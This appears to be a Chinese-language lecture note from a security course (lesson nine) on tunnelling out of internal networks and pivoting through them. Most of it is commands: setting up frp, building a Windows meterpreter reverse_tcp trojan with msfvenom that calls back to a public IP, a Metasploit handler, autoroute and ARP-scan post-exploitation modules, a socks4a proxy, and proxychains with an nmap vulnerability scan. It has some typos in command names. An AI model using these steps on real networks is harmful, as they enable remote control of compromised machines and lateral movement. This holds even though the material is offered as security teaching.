T3SEC —–第九讲:内网转发穿透

{% meting "2111364820" "tencent" "playlist" "theme:#FF4081" "mode:circulation" "mutex:true" "listmaxheight:200px" "preload:auto" "autoplay" %}

内网穿透和代理转发

一.内网穿透

花生壳 frp 等......

内网穿透--获取内网服务器的session

  • 配置frp穿透 https://github.com/fatedier/frp
  • 22==>6000 4444==>6002
  • 使用木马反弹session
  • msfvenom -p windows/meterpreter/reverse_tcp LHOST=123.57.147.141LPORT=6002 -f exe >test.exe
  • 选择模块 use exploit/multi/handler 设置set payload windows/meterpreter/reverse_tcp
    • set lhost 192.168.1.1
    • set lport 4444

二.内网代理转发

在msf下可使用

  • run post/windows/gather/arp_scanner rhost=192.168.1.0/24 //扫描内网中的192.168.1.0 网段
  • run post/multi/manage/autoroute //自动添加路由
  • run sutoroute -s 192.168.2.1/24 //添加192.168.2.1/24 的路由
  • run autoroute -p //查看路由条目

socks 代理

  • use auxiliary/server/socks4a //设置socks代理服务器

proxychains

  • proxychains遵循GUN协议的一款适用于Linux系统的网络代理设置工具.强制由任一程序发起的TCP连接请求必须通过注入TOP或SOCKS4,SOCKS5 或HTTP(S)代理.支持的认证方式包括:SOCKS4/5的用户/密码认证,HTTP的基本认证.允许TCP和DNS通过代理隧道,并且可配置多个代理.

proxychains配置

  • vi /etc/proxychains.cof
  • proxychains 使用
  • proxychains nmap -sT -sV --script=vuln 192.168.1.100

Q.E.D.